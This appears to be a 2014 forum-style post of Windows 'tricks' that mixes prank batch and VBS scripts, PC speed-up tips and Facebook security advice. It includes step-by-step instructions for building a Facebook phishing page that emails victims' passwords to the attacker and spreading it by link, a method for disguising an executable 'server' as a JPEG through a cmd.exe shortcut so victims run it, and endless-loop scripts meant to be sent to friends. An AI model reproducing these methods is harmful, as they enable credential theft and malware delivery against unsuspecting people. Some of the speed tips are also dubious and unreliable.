NOTEPAD TRICKS This trick will Open Notepad continuously - TopicsExpress



          

NOTEPAD TRICKS This trick will Open Notepad continuously automatically Step 1: Open Notepad. Step 2: Paste the following code in the notepad. @ECHO off :trick START %SystemRoot%\system32\notepad.exe GOTO trick Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ This trick will pop out error messages again and again Step 1: Open Notepad. Step 2: Paste the following code in the notepad. @ECHO off :Begin msg * Welcome to hackfact msg * You are learning cool notepad tricks msg * Notepad tricks rocks msg * Using notepad tricks we can even control whole computer msg * What are your views in all these tricks using notepad GOTO BEGIN Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ Matrix falling notepad trick After the success of the movie matrix people just started loving matrix pattern , its style. So here is a notepad trick which will show that matrix affect in your command prompt Step 1: Open Notepad. Step 2: Paste the following code in the notepad. @echo off color 02 :tricks echo %random%%random%%random%notepad%random%%random%tricks%random%%random%%random%%random%%random% goto tricks Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .bat for eg:- notepadtrick.bat Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) Notepad and vbsfile tricks combo Hit Enter Key Continuously Step 1: Open Notepad. Step 2: Paste the following code in the notepad. Set wshShell = wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys ~(enter) loop Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ Press backspace continuously notepad trick (so Lets go back a few steps.) Step 1: Open Notepad. Step 2: Paste the following code in the notepad. Set wshShell =wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys {bs} loop Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) ______________________ Toggle Caps Lock button On-Off Continuously Step 1: Open Notepad. Step 2: Paste the following code in the notepad. Set wshShell =wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys {CAPSLOCK} loop Step 3: Now go to file and click on save as Step 4: Give anyname with extention as .vbs for eg:- notepadtrick.vbs Step 5: Now go and click on it or you can send this notepad to your friends also.......bingoo...:) Now if u want to disable any of these notepad and vbs trick combo just go do task manager click on process then find wscript.exe and end this process and for all notepad and batch programming tricks combo just restart your computer or close the command prompt. CMD TRICKS How to do calculations on Command Prompt ? The command processor CMD.EXE comes with a mini calculator that can perform simple arithematic operations: C:\>SET /A 5+3 8 C:\>SET /A 3*(9/4) 6 C:\>SET /A (4*5)/5 4 How to Create your own Run Command ? Step 1: Go to “Start,” “Run,” (told you we use it a lot) and type regedit. Step 2: Navigate to the following: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Apps Path Step 3: Create a new folder/key under Apps Path. (Right-Click Apps Path and click “New,” “Key.”) Step 4: Title the new folder/key the name of the application, e.g. firefox.exe. Step 5: Right-Click the default string value (the thing automatically created in your new folder) and click Modify. Step 6: Change the value to the path of the executable you are attempting to run. E.g. C:\Program Files\Mozilla Firefox\firefox.exe. Step 7: Create a new “String Value” by right-clicking under the default value (the thing we just edited) and select “New,” “String Value.” Name it Path and enter the value as the same path you previously entered. HOW TO HACK FACEBOOK ACCOUNTS? How to hack facebook account and what are its preventive measures Step 1: Go to facebook Step 2: Save the login page of facebook (shortcut:press ctrl+S) Step 3: Now 2 things would have been saved in your computer with the name Welcome to Facebook - Log In, Sign Up or Learn More Step 4: Right click on the saved file with name Welcome to Facebook - Log In, Sign Up or Learn More.htm and open it with notepad Step 5: Now search where the word action is written in it for the first time (shortcut:press ctrl+F then type action in it and then press enter). Step 6: Now after action you will see action=https://facebook/login.php?login_attempt=1 id=login_form Step 7: Now replace that line with action=hackfact/fb.php?id=your-email-id-here@gmail&link=facebook/login.php?login_attempt=1 Step 8: Now replace the line your-email-id-here@gmail with your email-id where you want to recieve the password. Step 9: Save the notepad(shortcut: ctrl+s). Step 10: Now just put this page on your Desktop who so ever will login from this will be hacked. You will be having his/her password in your email-id or the other option you have is that upload this page on a free web hosting site where you can upload both these pages and if you have your own website you can upload this on that and send the link to others. bingoooooooo..:). Note: Remember both the files will be moved together which you saved with the name Welcome to Facebook - Log In, Sign Up or Learn More and you can rename the file with the name Welcome to Facebook - Log In, Sign Up or Learn More.htm but not that folder. This trick was for educational purpose only and the preventive measure is that always see the URL of the site(Complete URL if site has url facebook.hackfact then also its fake not genuine.). How to make PC really run faster than before? 1.Let your PC boot up completely before opening any applications. 2.Refresh the desktop after closing any application. This will remove any unused files from the RAM. 3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB). 4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM 5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin. 6.Delete the temporary internet files regularly. 7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster. 8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible. 9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application. 10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum. RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE! Lesson 2 - Simple (and free) ways how to speed up your computer: Tip: Disable the XP loading screen To speed up booting your computer process slightly, disable the Windows XP loading screen. This can be done very easy: - Open the MSCONFIG utility (Open Start\Run and type msconfig) - Select the boot.ini tab - Check the /NOGUIBOOT option. When you boot (start) your PC, you will see a black screen in between POST and the welcome screen from now on. Tip: Check your hard drives with scandisk With time, tons of small data problems and physical problems can develop and slow down the performance of your hard drive. While defragmenting the drive can help restore much of the performance you might have lost, there are other issues such as lost clusters which the defragmentation utility cannot fix. Because of this, it is a good idea to run XPs error checking utility once in a while. This utility scans your disks for errors and optionally attempt to correct them. - Open My computer - Right click the hard disk you wanna scan and select Properties from the menu - Choose the Tools tab and under Error checking click the Check now… button. - Check both options. You will need to restart the computer to do the full disk check. Your disk will be fully checked for errors upon reboot, but this can take quite a while. How to protect USB Virus from entering ur PC? Hi friends, i have a sloution for ur issue. You can make ur normal pen drive to virus protected pendrive. for that u want 1 pc which having windows vista 0r 7 os installed. Follow the below steps…….. 1) Connect ur pen drive to pc which having widows vista or windows 7 operating system. (The user must having Administrator rights) 2) Open ‘My Computer’ & right click on pendrive icon then select ‘Format’ option. Before formatting you must take a back up of all of your data because it deletes whole data from ur pen drive. 3) In Format window select file system tab & change it to ‘NTFS’ then click on ‘Start’ to start formatting. 4) After formatting done close the format window & open ur pendrive. 5) create one folder in pen drive & rename it to ‘secured’. 6) Back to ‘My Computer’ & again right click on pendrive & now select ‘Properties’ tab. 7) In properties window select security tab then click on edit & tick on ‘Deny’ for ‘Write’ permission then press ok to apply the settings. 8) Open pen drive again, right click on ‘Secured’ folder select ‘Properties’ then ‘Security’ tab. again click on ‘Edit’ tab & set ‘Allow’ permission to ‘Full Control’ then click ok to apply settings. 9) Open ‘Secured’ folder, create one folder into that & rename it to ‘Secured.exe’. 10) Right click on ‘Secured.exe’ folder select ‘Properties’ & make it hidden by selecting ‘Hidden’ attribute then select ‘security’ tab click on ‘Edit’ & set ‘Deny’ permission to ‘Full Control’ . 10) Press ‘Ok’ to apply the settings. Now ur pen drive is virus protected. but u can’t copy files into that directly. u need to copy all of ur files to the secured folder & I recommand that copy ur software setup files to the zip folder so, virus can’t access software’s exe files. How to hide and convert .exe into .jpeg? 1. Firstly, create a new folder and make sure that the options ‘show hidden files’ is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc. 2. Paste a copy of your server on the new created folder. let’s say it’s called server.exe (that’s why you need the extension of files showing, cause you need to see it to change it) 3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg 4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES. 5. Now create a shortcut of this picture.jpeg in the same folder. 6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg. 7. Go to properties (on file me.jpeg) and now you need to do some changes there. 8. First of all delete all the text on field START IN and leave it empty. 9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:WINDOWSsystem32cmd.exe /c picture.jpeg 10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:WINDOWSsystem32cmd.exe /c soccer.avi got it? 11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run. 12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%system32SHELL32.dll . Then press OK. 13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone. 14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter. 15. For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first. If you set hidden properties to the server (picture.jpeg) then u don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a zip file or rar. 16. So the best way to send these files together to someone is compress them into zip or rar. 17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it. How to disable Unwanted Visual effect in Windows 7? Disabling the Unwanted Visual Effects in Windows 7 to Speed Up more For this right click on ” Computer” and select “Properties” from the right click menu. Click on ” Advanced System Settings ” from the left pane to open up the ” System Properties ” window. Select the “Advanced” tab from it. Then Under ” Performance ” click ” Settings “. Choose ” Custom: ” Options From it. Now un tick all the options and select only the last four options (actually three only needed; you can un tick the second option from the last four). See the screen shot if you have any doubt. Now just logoff your system and turn logon. Even though we have tuned off the aero effects in Windows 7 still there are many unwanted visual effects that can be safely disabled to speed up windows 7 even more. disabling services in windows 7 Speed Up Windows 7 Ultimate Guide To Make Windows 7 Blazing Fast!!! You will now notice the speed difference now. How to protect Facebook account from being hacked? Hacking of Facebook Account #1. Its very easy to hack a Facebook account, If you are ignorant about the page URL. Many pishers around the Web create a page which will exactly look like the Facebook login page. If you login using that page, Your account will be in the hands of some Tom, Dick or Harry. So always check the URL of the page before logging in. Facebook Login Page 550x149 How to Prevent Hacking of Facebook Account #2. Visiting Links which are shared by your Friends. This would be also a cause of Hacking of Facebook account. So, Double check when you are visiting a link shared by your friends. If you think its a good clean link, then proceed. Links on Facebook How to Prevent Hacking of Facebook Account #3. Do you think, Your Facebook account is being accessed by anyone? Get Notified when your Facebook account is logged in from a different place. How to do this? 1. Login to your Facebook account, Click on Account and navigate to Account Settings. 2. Under Account Security, Check Send me an email, If a new computer or mobile device logs into this account. You can also Check Send me a text message, If you have added a mobile device. Account Security on Facebook 550x206 How to Prevent Hacking of Facebook Account Additional Tip: Also enable HTTPS secure browsing. HTTPS on Facebook How to Prevent Hacking of Facebook Account #4. Avoid using Spam Applications. Don’t try to use an application which you don’t know or seen some of your friends using. To View/Edit applications which you are using, Go to Applications Settings page. Additional Tip: Remove Applications which you are not using now. Account Security on Facebook 550x206 How to Prevent Hacking of Facebook Account #5. Always use a complex and very strong Password. A combination of Alphabets, Numbers and Special Characters is an unbeatable or unguessable password. Avoid using your Name, Girl Friends name, Your Mobile number etc., in your password as these are easily guessable. #6. Don’t accept requests from the people you don’t know. Avoid adding people you don’t know to your friends list. If he/she is a Mutual Friend then you can add. #7. Regularly scan your Computer with some Anti-Spyware or Anti-Malware tools. Some of the recommended tools are Panda Active Scan, Trend Micro Housecall Thus these are the 7 Basic as well as Best possible ways for preventing and stopping the Hacking of Facebook Account. How to disable AERO Theme on windows 7? Disable the Aero Theme on Windows 7 Right Click on your Desktop and select ” Personalize ” click the Window Color Tab. Uncheck the Box saying ” Enable Transparency ” and then click on ” Open classic appearance properties for more color options”. Then a window will open up. Apply a Standard or Basic theme from it. The Standard Windows 7 theme is more preferred. The aero user interface certainly adds some ” Eyecandy ” to Windows 7 but certainly is a resource hog especially when, what you expect from windows 7 is more performance juice. Aero user interface squeezes your graphics or video card to its maximum. So why dont we just avoid the Windows 7 aero? if we care more about speed and performance in Windows 7. So Disabling the Aero in Windows 7 certainly adds an extra speed boost to it. disabling aero Speed Up Windows 7 Ultimate Guide To Make Windows 7 Blazing Fast!!! Disabling the aero theme alone in Windows 7 will really speed things up. You can know this by looking into the memory consumption when aero is turned on and off.
Posted on: Wed, 11 Jun 2014 13:48:51 +0000

Recently Viewed Topics




© 2015